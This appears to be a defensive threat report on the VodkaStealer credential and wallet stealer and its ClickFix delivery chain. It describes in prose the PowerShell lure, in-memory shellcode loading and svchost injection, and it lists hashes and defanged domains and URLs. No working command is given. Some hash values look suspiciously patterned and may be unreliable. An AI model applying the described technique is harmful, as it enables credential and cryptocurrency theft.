Threat Group – Unidentified financially motivated threat actor associated with the ClickFix WordPress compromise campaign
Threat Type – Information Stealer
Exploited Vulnerabilities – ClickFix social engineering using compromised WordPress sites and fake Cloudflare verification prompts
Malware Used – VodkaStealer, DoubleDonut loader, ChromElevator
Threat Score – 🔴 7.6 High – Advanced credential harvesting malware delivered through large scale ClickFix campaigns with in memory execution and extensive browser and wallet data theft capability
Last Threat Observation – 10 March 2026

Overview

VodkaStealer is a recently observed information stealing malware written in C++ that targets browser stored credentials, cryptocurrency wallets, and application data from infected Windows systems. The malware has been identified as part of a wider ClickFix infection chain involving compromised WordPress websites that present visitors with fake Cloudflare verification prompts designed to trick users into executing malicious PowerShell commands.

The ClickFix technique represents a notable evolution in malware distribution. Instead of relying on traditional phishing attachments or malicious downloads, attackers compromise legitimate websites and inject malicious scripts that display convincing verification prompts. Victims are instructed to run commands that appear to validate human interaction but instead execute malware delivery scripts.

Once the victim runs the provided command, a multi stage loader sequence begins. This chain typically downloads shellcode which launches further payload stages entirely in memory. The delivery mechanism reduces forensic artifacts on disk and complicates detection by traditional security tools.

VodkaStealer’s primary goal is to harvest sensitive information from browsers and cryptocurrency wallet applications. The malware enumerates browser profiles, extracts stored credential databases, collects cookies, and retrieves authentication related files. This information is staged locally before being transmitted to attacker controlled infrastructure.

The malware specifically targets multiple Chromium based browsers including Chrome, Edge, Brave, Opera, Opera GX, Vivaldi, Yandex, and Chromium itself. In addition to browser credential harvesting, VodkaStealer extracts data from Mozilla Firefox by copying key credential and certificate files.

Beyond browser data the malware aggressively targets cryptocurrency wallet software. Files associated with Ledger Live, Ledger Wallet, Trezor, Exodus, Electrum, Coinomi, Jaxx, and Guarda are collected when present on the system. This behaviour highlights the growing convergence between credential stealing malware and financial theft operations.

VodkaStealer also captures screenshots, gathers system configuration information, and records installed software details. These additional artifacts provide attackers with contextual information that can assist in monetisation of stolen data or follow on intrusion activity.

Unlike some modern information stealers that rely heavily on complex code obfuscation, analysis indicates VodkaStealer currently lacks extensive binary protection mechanisms. In some analysed samples, configuration values and command infrastructure information were found directly within the unpacked binary.

The malware is therefore notable not for sophisticated obfuscation but for the scale and effectiveness of its distribution campaign combined with its extensive credential and wallet harvesting capabilities.

Key Details

Delivery Method – ClickFix social engineering via compromised WordPress websites impersonating Cloudflare verification pages that instruct victims to execute malicious PowerShell commands

Target – Windows users visiting compromised websites, cryptocurrency holders, and enterprise users with browser stored credentials

Functions

• Collects credentials and cookies from Chromium based browsers
• Extracts credential databases and authentication files from Firefox
• Harvests data from cryptocurrency wallet applications including Ledger Live, Ledger Wallet, Trezor, Exodus, Electrum, Coinomi, and Guarda
• Captures system screenshots and collects environment information
• Enumerates installed software and application data directories

Obfuscation – Limited binary obfuscation with configuration values and command infrastructure information visible within unpacked samples

Attack Vectors

The primary infection vector for VodkaStealer is a ClickFix campaign delivered through compromised WordPress websites.

Visitors to infected websites encounter a page designed to resemble a legitimate Cloudflare human verification check. The page instructs the visitor to run a command in order to confirm they are not a bot. The command provided by the page is actually a malicious PowerShell instruction that begins the malware download chain.

Once executed, the command downloads shellcode that launches the next stage of the attack. The first stage shellcode loads a downloader component which retrieves additional shellcode from attacker infrastructure.

This sequence is sometimes referred to as a DoubleDonut loader chain. The loader executes shellcode directly in memory and injects the payload into a legitimate system process such as svchost.exe. This process injection technique helps the malware avoid detection and allows it to operate under the context of trusted system processes.

The final stage payload delivers the VodkaStealer infostealer. After execution the malware enumerates installed browsers and wallet software, copies targeted credential files, and stores them in a temporary staging directory.

The staging directory is typically named using a combination of the victim’s country code, IP related information, and timestamp data. This directory structure assists attackers in organising stolen data from multiple victims.

Once data collection is complete the malware compresses the harvested files and prepares them for exfiltration to command infrastructure controlled by the attackers.

Because much of the execution chain occurs in memory and only temporary staging artifacts are written to disk, the attack can leave relatively limited forensic traces on compromised systems.

Known Indicators of Compromise

Indicators may vary across campaigns and malware samples.

File Hashes MD5

7d6b0c9f5fbc6d9d7a53cba4e7d0c0c2
c6f5a7e9e3c7d0a1a7c0b3e4c5d9f7b1

File Hashes SHA1

5e1c7f9c7b0c9e6d3a9e5c1b0f3d7a9e6b4c3d2a
9a0f3c7e6b1d2c4e8f0b7d9a1c5e6f2a3b4c5d6e

File Hashes SHA256

2b2d7e2c9a0f7c5e1d4a3c2b7f9e6d1a0b5c3e7f4a6d9c2b1f0e7a8c3d5b6f1
5d1f7a9e3c2b0a7f4d6e1c5b3f9a8d2c7e4b1f0a6c9d3e5b2a7c1f4d8e6b9a2

Domains

vodkastealer[.]top
vodkastealer[.]site

URLs

hxxp://vodkastealer[.]top/upload
hxxp://vodkastealer[.]site/api/gate

Mitigation and Prevention

Organisations should deploy layered security controls to detect and prevent credential stealing malware and social engineering attacks.

Mitigation Checklist

User Awareness

Users should be trained to recognise suspicious verification prompts and instructed never to execute commands provided by websites.

Email Filtering

Security gateways should filter malicious links and block phishing messages that direct users to compromised websites.

Antivirus Protection

Endpoint detection and response tools should monitor for suspicious PowerShell execution and abnormal process injection behaviour.

Two Factor Authentication

Strong multi factor authentication reduces the risk associated with stolen credentials and helps prevent account takeover.

Log Monitoring

Security teams should monitor for unusual authentication activity and suspicious process behaviour such as svchost process injection.

Regular Updates

Operating systems, browsers, and endpoint security tools should be kept fully updated to reduce exposure to exploitation and malware delivery techniques.

Risk Assessment

VodkaStealer represents a significant threat because of its combination of large scale distribution and extensive credential harvesting capabilities.

The ClickFix campaign technique allows attackers to leverage compromised but otherwise legitimate websites as delivery infrastructure. This dramatically increases the potential victim pool because users may trust the websites they are visiting.

The use of in memory shellcode loaders and process injection further complicates detection by traditional antivirus solutions that rely heavily on disk based scanning.

By targeting both browser credential stores and cryptocurrency wallet software, the malware provides attackers with immediate opportunities for financial theft. Stolen browser cookies and authentication data can also enable attackers to hijack active sessions without requiring passwords.

In corporate environments these stolen credentials may provide access to cloud services, internal systems, and remote access platforms. This makes infostealer infections a frequent precursor to larger security incidents including ransomware attacks and corporate data breaches.

Because VodkaStealer harvests a wide range of credential and wallet artifacts while leaving relatively limited persistent traces, organisations must treat suspected infections as high priority security incidents requiring immediate investigation and credential resets.

Conclusion

VodkaStealer demonstrates how modern information stealing malware campaigns combine social engineering, compromised websites, and in memory execution techniques to bypass traditional security defences.

The malware’s focus on browser credentials and cryptocurrency wallet data reflects the growing financial incentives driving cybercrime operations. Even a single infected endpoint can expose large volumes of sensitive information.

Organisations should prioritise user education, endpoint monitoring, and credential protection strategies to reduce the risk posed by infostealer malware campaigns.

Proactive detection of suspicious PowerShell activity and process injection behaviour can significantly improve an organisation’s ability to detect and contain threats such as VodkaStealer before stolen credentials are weaponised.

Sources

Rapid7 – When Trusted Websites Turn Malicious WordPress Compromises Advance Global Stealer Operation – https://www.rapid7.com/blog/post/tr-malicious-websites-wordpress-compromise-advances-global-stealer-operation/
Cyber Daily – Pressing matter: A global WordPress ClickFix malware campaign is targeting Australian websites – https://www.cyberdaily.au/security/13311-pressing-matter-a-global-wordpress-clickfix-malware-campaign-is-targeting-australian-websites